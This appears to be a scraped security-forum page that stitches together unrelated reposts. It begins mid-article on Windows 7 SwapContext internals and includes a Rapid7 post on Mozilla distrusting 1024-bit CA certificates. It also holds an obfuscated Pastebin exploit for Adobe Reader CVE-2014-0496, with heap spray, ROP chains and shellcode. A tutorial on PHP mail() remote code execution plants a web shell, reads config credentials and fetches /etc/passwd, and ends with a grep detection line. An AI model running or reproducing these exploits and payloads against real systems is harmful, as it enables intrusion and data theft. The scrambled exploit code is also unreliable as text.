kernel stack pointer is taken from TSS's ESP0 field. Logically speaking, ESP0 field of the TSS must be changed on every context-switch to the kernel stack pointer of the new thread. In order to do so, SwapContext takes the kernel stack pointer at NewThread->InitialStack (InitialStack = StackBase - 0x30) ,it substrats the space that it has used to save the floating-point registers using fxsave instruction and another additional 16 bytes for stack alignment, then it stores the resulted stack pointer in the TSS's Esp0 field : pPcr->TssCopy.Esp0 (TSS can be also accessed using the TR segment register). 9 - We've completed the context-switch now and the old thread can be finally marked as "stopped running" by setting the previously discussed boolean value "Running" to FALSE. OldThread->Running = FALSE. 10 - If fxsave was previously executed by the new thread (the last time its context was switched), the data (floating-point registers...) saved by it is loaded again using xrstor instruction. 11 - Next the TEB (Thread environment block) pointer is updated in the PCR : pPcr->Used_Self = NewThread->Teb . So the Used_Self field of the PCR points always to the current thread's TEB. 12 - The New thread's context switches count is incremented (NewThread->ContextSwitches++). 13 - It's finally the time to pop the 2 values that SwapContext pushed , the pointer to the exception list and the IRQL from the new thread's stack. the saved IRQL value is restored in ECX and the exception list pointer is popped into its field in the PCR. 14 - A check is done to see if the context-switch was performed from a DPC routine (Entering a wait state for example) which is prohibited. If pPrcb->DpcRoutineActive boolean is TRUE this means that the current processor is currently executing a DPC routine and SwapContext will immediately call KeBugCheck which will show a BSOD : ATTEMPTED_SWITCH_FROM_DPC. 15 - This is the step where the IRQL (NewThread->WaitIrql) value stored in ECX comes to use. As mentionned earlier SwapContext returns a boolean value telling the caller if it has to deliver any pending APCs. During this step SwapContext will check the new thread's ApcState to see if there are any kernel APCs pending. If there are : a second check is performed to see if special kernel APCs are disabled , if they're not disabled ECX is tested to see if it's PASSIVE_LEVEL, if it is above PASSIVE_LEVEL an APC_LEVEL software interrupt is requested and the function returns FALSE. Actually the only case that SwapContext returns TRUE is if ECX is equal to PASSIVE_LEVEL so the caller will proceed to lowering IRQL to APC_LEVEL first to call KiDeliverApc and then lower it to PASSIVE_LEVEL afterwards. Special Case : This special case is actually about the IRQL value supplied to SwapContext in ECX. The nature of this value depends on the caller in such way that if the caller will lower the IRQL immediately upon returning from SwapContext or not. Let's take 2 examples : KiQuantumEnd and KiExitDispatcher routines. (KiQuantumEnd is the special case) If you disassemble KiExitDispatcher you'll notice that before calling KiSwapContext it stores the OldIrql (before it was raised to DISPATCH_LEVEL) in the WaitIrql of the old thread so when the thread gains execution again at a later time SwapContext will decide whether there any APCs to deliver or not. KiExitDispatcher makes use of the return value of KiSwapContext (KiSwapContext returns the same value returned by SwapContext) to lower the IRQL. (see step 15 last sentence). However, by disassembling KiQuantumEnd you'll see that it's storing APC_LEVEL at the old thread's WaitIrql without even caring about in which IRQL the thread was running before. If you refer back to my flowchart in the previous article you'll see that KiQuantumEnd always insures that SwapContext returns FALSE , first of all because KiQuantumEnd was called as a result of calling KiDispatchInterrupt which is meant to be called when a DISPATCH_LEVEL software interrupt was requested.Thus, KiDispatchInterrupt was called by HalpDispatchSoftwareInterrupt which is normally called by HalpCheckForSoftwareInterrupt. HalpDispatchSoftwareInterrupt is the function responsible for raising the IRQL to the software interrupt level (APC_LEVEL or DISPATCH_LEVEL) and upon returning from it HalpCheckForSoftwareInterrupt recovers back the IRQL to its original value (OldIrql). So the reason why KiQuantumEnd doesn't care about KiSwapContext return value because it won't proceed to lowering the IRQL (not its responsibility) nor to deliver any APCs that's why it's supplying APC_LEVEL as an old IRQL value to SwapContext so that it will return FALSE. However, a software interrupt might be requested by SwapContext if there are any pending APCs. KiDispatchInterrupt which calls SwapContext directly uses the same approach as KiQuantumEnd, instead of storing the value at OldThread->WaitIrql it just moves it into ECX. Post notes : - Based on Windows 7 32 bit :> - For any questions or suggestions feel free to leave a comment below or send me an email : souhail.hammou@outlook.com See you again soon -Souhail Sursa: Reverse Engineering 0x4 Fun: Windows Internals - A look into SwapContext routine

[h=1]CVE-2014-0496 Adobe Pdf Exploit ToolButton[/h] @PhysicalDrive0 }); 1 0 obj 2 0 obj 3 0 obj 4 0 obj 5 0 obj 6 0 obj 7 0 obj aaa += aaa; aa=dd13.split("%u"); aa[i]=str12+aa[i]; /AcroForm 6 0 R addButtonFunc = function () { af1="aaaaa%aaaaaaaauaaaaaa"; af1=af1[("112","a2s1","replace")](/a/g,''); app.addToolButton({ app.addToolButton({ app.alert('123'); app.removeToolButton({ as1211(); bbb += aaa; bbb = bbb.substring(0, i11 / 2); bbb += sa; bbb += str; break; ccc += ccc; cEnable: "addButtonFunc();" cEnable: "removeButtonFunc();" cExec: "1", cExec: "1", cName: "evil" cName: "evil", cName: "xxx", </config> <config xmlns="http://www.xfa.org/schema/xci/2.6/"> /Count 1 dd13=aa.join('%u'); dd13=af1+dd13; dd13=xx13.join('%u'); } else { } else if (app.viewerVersion >= 10 && app.viewerVersion < 11 && app.viewerVersion <= 10.106) { } else if (app.viewerVersion >= 11 && app.viewerVersion <= 11.002) { endobj endstream for (i = 0; i < 0x1c / 2; i++) part1 += this[un12]("%u4141"); for (i = 0; i < 0x1e0 + 0x10; i++) eee[i] = ddd + "s"; for (i = 0; i < 10; i++) arr[i] = part1.concat(part2); for (i = 0; i < aa[tt1]; i++) for (i = 0; i < part2_len / 2 - 1; i++) part2 += this[un12]("%u4141"); function as1211() function heapSpray(str, str_addr, r_addr) { function opp12(xx13) heapSpray(payload, ret_addr, r_addr); if (app.viewerVersion >= x11 && app.viewerVersion < 10 && app.viewerVersion <= 9.504) { if(ccc[tt] >= (0x40000*2)) if(j) if (!r11) { if (vulnerable) { j=4-aa[i][tt1]; /Kids [3 0 R] <</Length 10074>> <</Length 372>> obj_size = 0x330 + 0x1c; obj_size = 0x360 + 0x1c; obj_size = 0x370; /OpenAction 4 0 R /Pages 2 0 R <pageSet></pageSet> /Parent 2 0 R part1 += rop_addr; %%%%%PDF-6.5 PE/%%%%%% <present><pdf><interactive>1</interactive></pdf></present> r11 = true; r_addr = 0x08a8; r_addr = 0x08e4; r_addr = 0x08e8; removeButtonFunc = function () { ret_addr = this[un12]("%u8003%u4a84"); ret_addr = this[un12]("%ua83e%u4a82"); ret_addr = this[un12]("%ua8df%u4a82"); return; return dd13; rop_addr = this[un12]("%u08a8%u0c0c"); rop_addr = this[un12]("%u08e4%u0c0c"); rop_addr = this[un12]("%u08e8%u0c0c"); rop = rop10; rop = rop11; rop = rop9; <</Size 8/Root 1 0 R>> str12=new Array(j+1).join("0"); stream <subform name="form1" layout="tb" locale="en_US"> </subform></template></xdp:xdp> <template xmlns="http://www.xfa.org/schema/xfa-template/2.6/"> trailer tt1=tt1[("112","a2s1","replace")](/a/g,''); tt=tt[("112","a2s1","replace")](/a/g,''); /tYPE/aCTION/S/JavaScript/JS 5 0 R>> /type /Page /Type /Page /Type /Pages un12=''; un12=un12[("112","as1","replace")](/w/g,''); un12="uwnwwewwwswcwwwawwpwe"; var aaa = this[un12]("%u0c0c"); var arr = new Array(); var bbb = aaa.substring(0, i1 / 2); var ccc = bbb.substring(0, i2 / 2); var ddd = ccc.substring(0, 0x80000 - i3); var eee = new Array(); var executable = ""; var i11 = 0x0c0c - 0x24; var i1 = r_addr - 0x24; var i2 = 0x4000 + 0xc000; var i3 = (0x1020 - 0x08) / 2; var obj_size; var part1 = ""; var part2 = ""; var part2_len = obj_size - part1[tt1] * 2; var payload = rop + shellcode; var r11 = false; var r_addr; var ret_addr; var rop; var rop10 = this[("123","1a1",un12)](opp12(xx132)); var rop11 = this[("123","1a1",un12)](opp12(xx131)); var rop9 = this[("123","1a1",un12)](opp12(xx133)); var rop_addr; var sa = str_addr; var shellcode = this[("123","1a1",un12)](opp12(xx134)); var tt1="alaaeaanaaagataaah"; var tt="alaaeaanaagataah"; var vulnerable = true; var xx131=new Array(0x822c.toString(16),0x4a85.toString(16),0xf129.toString(16),0x4a82.toString(16),0x597f.toString(16),0x4a85.toString(16),0x6038.toString(16),0x4a86.toString(16),0xf1d5.toString(16),0x4a83.toString(16),0xffff.toString(16),0xffff.toString(16),0x0000.toString(16),0x0000.toString(16),0x0040.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x1000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x5093.toString(16),0x4a85.toString(16),0xbc12.toString(16),0x2946.toString(16),0x0030.toString(16),0x4a85.toString(16),0x597f.toString(16),0x4a85.toString(16),0x0031.toString(16),0x4a85.toString(16),0x8a79.toString(16),0x81ea.toString(16),0x822c.toString(16),0x4a85.toString(16),0xf1d5.toString(16),0x4a83.toString(16),0xd4f8.toString(16),0x4a85.toString(16),0x6030.toString(16),0x4a86.toString(16),0x4864.toString(16),0x4a81.toString(16),0x0026.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x4856.toString(16),0x4a81.toString(16),0x05a0.toString(16),0x4a85.toString(16),0x0bc4.toString(16),0x4a86.toString(16),0x05a0.toString(16),0x4a85.toString(16),0xc376.toString(16),0x4a81.toString(16),0x63d0.toString(16),0x4a84.toString(16),0x0400.toString(16),0x0000.toString(16),0xd4f8.toString(16),0x4a85.toString(16),0xd4f8.toString(16),0x4a85.toString(16),0x4864.toString(16),0x4a81.toString(16)); var xx132=new Array(0x6015.toString(16),0x4a82.toString(16),0xe090.toString(16),0x4a82.toString(16),0x007d.toString(16),0x4a82.toString(16),0x0038.toString(16),0x4a85.toString(16),0x46d5.toString(16),0x4a82.toString(16),0xffff.toString(16),0xffff.toString(16),0x0000.toString(16),0x0000.toString(16),0x0040.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x1000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x5016.toString(16),0x4a80.toString(16),0x420c.toString(16),0x4a84.toString(16),0x4241.toString(16),0x4a81.toString(16),0x007d.toString(16),0x4a82.toString(16),0x6015.toString(16),0x4a82.toString(16),0x0030.toString(16),0x4a85.toString(16),0xb49d.toString(16),0x4a84.toString(16),0x6015.toString(16),0x4a82.toString(16),0x46d5.toString(16),0x4a82.toString(16),0x4197.toString(16),0x4a81.toString(16),0x0026.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x4013.toString(16),0x4a81.toString(16),0xe036.toString(16),0x4a84.toString(16),0xa8df.toString(16),0x4a82.toString(16),0xadef.toString(16),0xd2fc.toString(16),0x0400.toString(16),0x0000.toString(16),0xb045.toString(16),0x55c8.toString(16),0x8b31.toString(16),0x4a81.toString(16),0x4197.toString(16),0x4a81.toString(16)); var xx133=new Array(0x313d.toString(16),0x4a82.toString(16),0xa713.toString(16),0x4a82.toString(16),0x1f90.toString(16),0x4a80.toString(16),0x9038.toString(16),0x4a84.toString(16),0x7e7d.toString(16),0x4a80.toString(16),0xffff.toString(16),0xffff.toString(16),0x0000.toString(16),0x0000.toString(16),0x0040.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x1000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x155a.toString(16),0x4a80.toString(16),0x3a84.toString(16),0x4a84.toString(16),0xd4de.toString(16),0x4a82.toString(16),0x1f90.toString(16),0x4a80.toString(16),0x76aa.toString(16),0x4a84.toString(16),0x9030.toString(16),0x4a84.toString(16),0x4122.toString(16),0x4a84.toString(16),0x76aa.toString(16),0x4a84.toString(16),0x7e7d.toString(16),0x4a80.toString(16),0x3178.toString(16),0x4a81.toString(16),0x0026.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x3a82.toString(16),0x4a84.toString(16),0x6c5e.toString(16),0x4a84.toString(16),0x76ab.toString(16),0x4a84.toString(16),0xfec2.toString(16),0x2bca.toString(16),0x0400.toString(16),0x0000.toString(16),0xaab9.toString(16),0x6d5d.toString(16),0x7984.toString(16),0x4a81.toString(16),0x3178.toString(16),0x4a81.toString(16)); var xx134=new Array(0x88bf.toString(16),0xcb87.toString(16),0xdb8d.toString(16),0xd9c8.toString(16),0x2474.toString(16),0x5df4.toString(16),0xc929.toString(16),0x44b1.toString(16),0x7d31.toString(16),0x0314.toString(16),0x147d.toString(16),0xed83.toString(16),0x6afc.toString(16),0x1272.toString(16),0xf166.toString(16),0xd1a4.toString(16),0xf15d.toString(16),0xc866.toString(16),0x8e2c.toString(16),0x25b9.toString(16),0xfb34.toString(16),0x85cb.toString(16),0x8d3e.toString(16),0x6d27.toString(16),0x6d36.toString(16),0x37b3.toString(16),0x06bf.toString(16),0x97bd.toString(16),0x2e34.toString(16),0x977a.toString(16),0x3b52.toString(16),0x7e89.toString(16),0x1262.toString(16),0x6092.toString(16),0x1f04.toString(16),0x4701.toString(16),0x94e1.toString(16),0xbb9f.toString(16),0xfe62.toString(16),0xbc37.toString(16),0x1475.toString(16),0x76cc.toString(16),0x636e.toString(16),0xa689.toString(16),0x988f.toString(16),0x93cd.toString(16),0xd5c6.toString(16),0x5726.toString(16),0x07d9.toString(16),0x9877.toString(16),0x17eb.toString(16),0xca84.toString(16),0x5788.toString(16),0x1401.toString(16),0x9850.toString(16),0x1be7.toString(16),0xcd95.toString(16),0x200c.toString(16),0x3565.toString(16),0x22c5.toString(16),0xbe74.toString(16),0xe94f.toString(16),0x2b77.toString(16),0x7a09.toString(16),0xe07b.toString(16),0x265d.toString(16),0xf798.toString(16),0x5c8a.toString(16),0x7ca4.toString(16),0x8b4d.toString(16),0xc62c.toString(16),0x576a.toString(16),0x054e.toString(16),0x6fc0.toString(16),0x5db9.toString(16),0x95ac.toString(16),0x9f30.toString(16),0xdbc7.toString(16),0x110d.toString(16),0xb6f4.toString(16),0xb279.toString(16),0xc8fb.toString(16),0x4585.toString(16),0x3346.toString(16),0x2bc1.toString(16),0xd991.toString(16),0x5446.toString(16),0x3a3d.toString(16),0xb2fb.toString(16),0xbdb0.toString(16),0xbd04.toString(16),0x0444.toString(16),0x29f3.toString(16),0xeb3b.toString(16),0xe823.toString(16),0xc0ab.toString(16),0xc411.toString(16),0x4f4f.toString(16),0x6b23.toString(16),0xfdf5.toString(16),0xd743.toString(16),0x0bd1.toString(16),0x01dd.toString(16),0xf34f.toString(16),0xc988.toString(16),0xc9f9.toString(16),0x6a63.toString(16),0x6f51.toString(16),0x30ce.toString(16),0x6c25.toString(16),0x1af5.toString(16),0xecc2.toString(16),0x650a.toString(16),0x87ed.toString(16),0xe19b.toString(16),0x784a.toString(16),0x700c.toString(16),0x1d0c.toString(16),0x1a8e.toString(16),0xb89f.toString(16),0xa97d.toString(16),0x982e.toString(16),0x110a.toString(16),0x1475.toString(16),0x4a82.toString(16),0x701d.toString(16),0xacb4.toString(16),0xe8fe.toString(16),0xfff9.toString(16),0xc9b8.toString(16),0x8d69.toString(16),0x672b.toString(16),0x194a.toString(16),0x5bdb.toString(16),0xbfaa.toString(16),0xec4b.toString(16),0x53cf.toString(16),0xdde0.toString(16),0x23c6.toString(16),0x39b4.toString(16),0xbac9.toString(16),0x73a4.toString(16),0xee3b.toString(16),0x2575.toString(16),0xf1e9.toString(16),0xf4aa.toString(16),0x5dcd.toString(16),0xa2b4.toString(16),0x41c5.toString(16)); vulnerable = false; while (1) while ((aaa[tt] + 28) < (0x8000*2)) aaa += aaa; while (sa[tt] < (xxx - r_addr)) sa += sa; x11=9; <xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/"> <</XFA 7 0 R>> <?xml version="1.0" encoding="UTF-8"?> xxx=0x0c0c; Sursa: CVE-2014-0496 Adobe Pdf Exploit ToolButton - Pastebin.com

Firma este foarte mare si serioasa, nu e firma de bloc. Recomand celor cu experienta.

Not bad. Fa un video.

[h=1]107,000 web sites no longer trusted by Mozilla[/h]Posted by jnickel in Project Sonar on Sep 4, 2014 3:48:43 PM Mozilla's Firefox and Thunderbird recently removed 1024-bit certificate authority (CA) certificates from their trusted store. This change was announced to the various certificate authorities in May of this year and shipped with Firefox 32 on September 2nd. This change was a long time coming, as the National Institute of Standards and Technology (NIST) recommended that 1024-bit RSA keys be deprecated in 2010 and disallowed after 2013. A blog post at http://kuix.de/blog provided a list of specific certificates that would no longer be trusted starting with Firefox 32. There is a little disagreement that 1024-bit RSA keys may be cracked today by adversaries with the resources of nation states. As technology marches on, the security of 1024-bit keys will continue to deteriorate and become accessible by operators of relatively small clusters of commodity hardware. In the case of a CA key, the successful factoring of the RSA primes would allow an adversary to sign any certificate just as the CA in question would. This would allow impersonation of any "secure" web site, so long as the software you use still trusts these keys. This is certainly a welcome change, but how many sites are going to be affected by the removal of these CA certificates, and, how many of these sites have certificates that aren't due to expire anytime soon? Fortunately there is a means to answer these questions. In June of 2012, the University of Michigan began scanning the Internet and collecting SSL certificates from all sites that responded on port 443. At Rapid7, we started our own collection of certificates starting in September of 2013 as part of Project Sonar, and have been conducting weekly scans since. Both sets of scans record the entire certificate chain, including the intermediate CA keys that Mozilla recently removed from the trusted store. We loaded approximately 150 scans into a Postgres database, resulting in over 65 million unique certificates, and started crunching the data. The first question we wanted to answer, which is how many sites are affected, was relatively easy to determine. We searched the certificate chain for each of the roughly 20 million web sites we index to check if the SHA1 hashes listed in the blog post are present in the signing chain. After several minutes Postgres listed 107,535 sites that are using a certificate signed by the soon-to-be untrusted CA certificates. That is a relatively large number of sites and represents roughly half a percent of all of the web sites in our database. The next question we wanted to explore was how long the 1024-bit CA key signed certificates would continue to be used. This proved to be informative and presents a clearer picture of the impact. We modified the first query and grouped the sites by the certificate expiration date, rounded to the start of the month. The monthly counts of affected sites, grouped by expiration date, demonstrated the full extent of the problem. The resultant data, shown in part in the graph below, makes it clear that the problem isn't nearly as bad as the initial numbers indicated, since a great many of the certificates have already expired and the rest will do so over the next year. Surprisingly, over 13,000 web sites presented a certificate that expired in July of this year. Digging into these, we found that almost all of these had been issued to Vodafone and expired on July 1st. These expired certificates still appear to be in use today. The graph below demonstrates that the majority of affected certificates have already expired and those that haven't expired are due to expire in the next year. We have excluded certificates from the graph that expired prior to 2013 for legibility. While Mozilla's decision will affect a few sites, most of those that are active and affected have already expired, and shouldn't be trusted on that basis alone. In summary, the repeal of trust for these certificates is a sound decision based upon NIST recommendations, and while it initially appeared that a great many sites would be affected, the majority of these sites either have expired certificates or a certificate that expires within the next year. We hope that Chrome and other browsers will also remove these certificates to remove the potential risk involved with these 1024-bit CA keys. Going forward, we are now tracking the certificates presented by SMTP, IMAP, and POP services, and will keep an eye on those as the data rolls in. If you still use a 1024-bit RSA key for any other purpose, such as a Secure Shell (SSH) or PGP, it is past time to consider those obsolete and start rolling out stronger keys, of at least 2048 bits, and using ECC-based keys where available. - Labs Sursa: https://community.rapid7.com/community/infosec/sonar/blog/2014/09/04/107000-web-sites-no-longer-trusted-by-mozilla

Exploit PHP’s mail() to get remote code execution September 3, 2014 While searching around the web for new nifty tricks I stumbled across this post about how to get remote code exeution exploiting PHP’s mail() function. Update: After some further thinking and looking into this even more, I’ve found that my statement about this only being possible in really rare cases was wrong. Since this can also be exploited in other scenarios which is much more common than I first thought. So, instead of removing content, I added a strike through on the statements that’s no longer valid, and updated with a 2nd scenario explanation. First, I must say that this is only going to happen under some really rare circustances. Never the less, it’s really something to think about and keep an eye out for. I will explain an example scenario which I think could be a real life scenario later in this article. So, when that’s said, let’s have a look at what this is all about. When using PHP to send emails we can use PHP’s built in function mail(). This function takes a total of five parameters. To Subject Message Headers (Optional) Parameters (Optional) This looks pretty innocent at first glance, but if this is used wrong it can be really bad. The parameter of interest is the 5th and last one, so let’s have a look at what the PHP manual has to say about it. The additional_parameters parameter can be used to pass additional flags as command line options to the program configured to be used when sending mail, as defined by the sendmail_path configuration setting. For example, this can be used to set the envelope sender address when using sendmail with the -f sendmail option. This is really interesting. In short, this say that we can alter the behavior of the sendmail application. Update: I should have added this from the beginning, but just to make this clear: The fifth argument is disabled when PHP is running in safe mode mail() In safe mode, the fifth parameter is disabled. (note: only affected since PHP 4.2.3) Source: PHP: Functions restricted/disabled by safe mode - Manual Now, let’s have a look at the sendmail manual. I’m not going to post the entire manual here, but I will highlight some of the interesting parts. Some interesting parameters -O option=value Set option option to the specified value. This form uses long names. -Cfile Use alternate configuration file. Sendmail gives up any enhanced (set-user-ID or set-group-ID) privileges if an alternate configuration file is specified. -X logfile Log all traffic in and out of mailers in the indicated log file. This should only be used as a last resort for debugging mailer bugs. It will log a lot of data very quickly. Some interesting options QueueDirectory=queuedir Select the directory in which to queue messages. So how can this be exploited? Remote Code Execution As stated above, this only occurs under very specific circumstances. For this to be exploitable, the user has to be able to control what goes into the 5th parameter, which does not make sense at all that anyone would do it. But it’s still something that really should be kept in mind by developers. With that said, let’s just dive into it! This is the code for exploiting the mail() function $to = 'a@b.c'; $subject = '<?php system($_GET["cmd"]); ?>'; $message = ''; $headers = ''; $options = '-OQueueDirectory=/tmp -X/var/www/html/rce.php'; mail($to, $subject, $message, $headers, $options); Let’s inspect the logs from this. First let’s have a look at what we can see in the browser by only going to the rce.php file 11226 <<< To: a@b.c 11226 <<< Subject: 11226 <<< X-PHP-Originating-Script: 1000:mailexploit.php 11226 <<< Nothing really scary to see in this log. Now, let’s use the cat command in the terminal on the same file > cat rce.php 11226 <<< To: a@b.c 11226 <<< Subject: <?php system($_GET["cmd"]); ?> 11226 <<< X-PHP-Originating-Script: 1000:mailexploit.php 11226 <<< See anything a bit more interesting? Let’s try to execute some commands. I visit http://localhost/rce.php?cmd=ls%20-la and get the following output 11226 <<< To: a@b.c 11226 <<< Subject: total 20 drwxrwxrwx 2 *** *** 4096 Sep 3 01:25 . drwxr-xr-x 4 *** www-data 4096 Sep 2 23:53 .. -rw-r--r-- 1 *** *** 92 Sep 3 01:12 config.php -rwxrwxrwx 1 *** *** 206 Sep 3 01:25 mailexploit.php -rw-r--r-- 1 www-data www-data 176 Sep 3 01:27 rce.php 11226 <<< X-PHP-Originating-Script: 1000:mailexploit.php 11226 <<< 11226 <<< 11226 <<< 11226 <<< [EOF] Now, let me break it down in case you don’t fully understand the code The first four variables is pretty straight forward. We set the recipient email address to some bogus address, then in the subject we inject the PHP code that will be executing our commands on the system, followed by empty message and headers. Then on the fith variable is where the magic happens. The $options variable holds a string that will let us write our malicious code get remote code execution to the server. First we change the mail queue directory to /tmp using the -O argument with the QueueDirectory option. The reason why we want it there is because this is globally writable. Second the path and filename for the log is changed to /var/www/html/rce.php using the -X argument. Keep in mind that this path will not always be the same. You will have to craft this to fit the targets file system. If we now point our browser at http://example.com/rce.php it will display the log for the attempted delivery. But since we added the PHP code to the $subject variable, we can now add the following query ?cmd=[some command here]. For example http://example.com/rce.php?cmd=cat%20/etc/passwd. If you want you could also create a Local/Remote File Inclusion vulnerability as well. To do this, just change system() to include(). This can be handy if wget is not available, or you’re not able to include a remote web shell. It’s also important to know, that it’s not only the subject field that can be used to inject arbitrary code. The content of all the fields, except the fifth, is written to the log. Read files on the server Another way to exploit this is to directly read files on the server. This can be done by using the -C argument as shown above. I have made a dummy configuration file just to show how it works $to = ‘a@b.c'; $subject = ''; $message = ''; $headers = ''; $options = '-C/var/www/html/config.php -OQueueDirectory=/tmp -X/var/www/html/evil.php'; mail($to, $subject, $message, $headers, $options); This creates a file named evil.php with the following content 11124 >>> /var/www/html/config.php: line 1: unknown configuration line "<?php" 11124 >>> /var/www/html/config.php: line 3: unknown configuration line "dbuser = 'someuser';" 11124 >>> /var/www/html/config.php: line 4: unknown configuration line "dbpass = 'somepass';" 11124 >>> /var/www/html/config.php: line 5: unknown configuration line "dbhost = 'localhost';" 11124 >>> /var/www/html/config.php: line 6: unknown configuration line "dbname = 'mydb';" 11124 >>> No local mailer defined Now we have managed to extract very sensitive data, and there’s a lot of other things we can extract from the server. A real-life scenario where this can become a reality Scenario #1: Admin panel To be honest I actually had to think for this for a file. I mean, who would be so stupid that they let their users control the sendmail parameters. Well, it really doesn’t have to be that stupid. So consider this following scenario. You have an admin panel for your website. Just like every other admin panel with respect for itself it let’s your set different settings for sending emails. Stuff like port, smtp, etc. But not only that, this administration panel actually let’s you monitor your mail logs, and you can decide where to store the logs. Suddenly the idea of the values of the 5th parameter being controlled by an end user doesn’t sound that stupid anymore. You would of course not let this be modified from the contact form But admins wouldn’t hack their own site would they.. So in combination with other attacks that results in unauthorized access, this can become a real threat since you can actually create vulnerabilities that was not originally in the application. Scenario #2: Email service The idea around this scenario spawned from the original post linked to in the beginning of the article. So, let’s consider we are running a website where a person can send an email to a recipient. In this case, the user must manually set the from address. Now, in the code we use the -f argument along with the user inputted from address. Now if this from field is poorly validated and sanitized the user can continue writing the required arguments and values directly. How to detect a possible vulnerability The fastes way to detect any possibility for this in code is to use Linux’s grep command, and recursively look for any use of mail() with all 5 parameters in use. Position yourself in the root of whatever project you want to check and execute the following command. This will return all code lines that uses mail() with five parameters. grep -r -n --include "*.php" "mail(.*,.*,.*,.*,.*)" * There will probably be some false positives, so if you have any suggestions to improve this to make it even more accurate, please let me know! Summary This is not something that you will stumble across often. To be honest I don’t expect to ever see this in the wild at all, though it would be really cool to do so, but you never know as explained in the “real-life scenario” section. Still, I do find this to be really interesting, and it makes you think “what other PHP functions can do this?” I hope you enjoyed the article and if you have any comments you know what to do Sursa: Exploit PHP’s mail() to get remote code execution | Security Sucks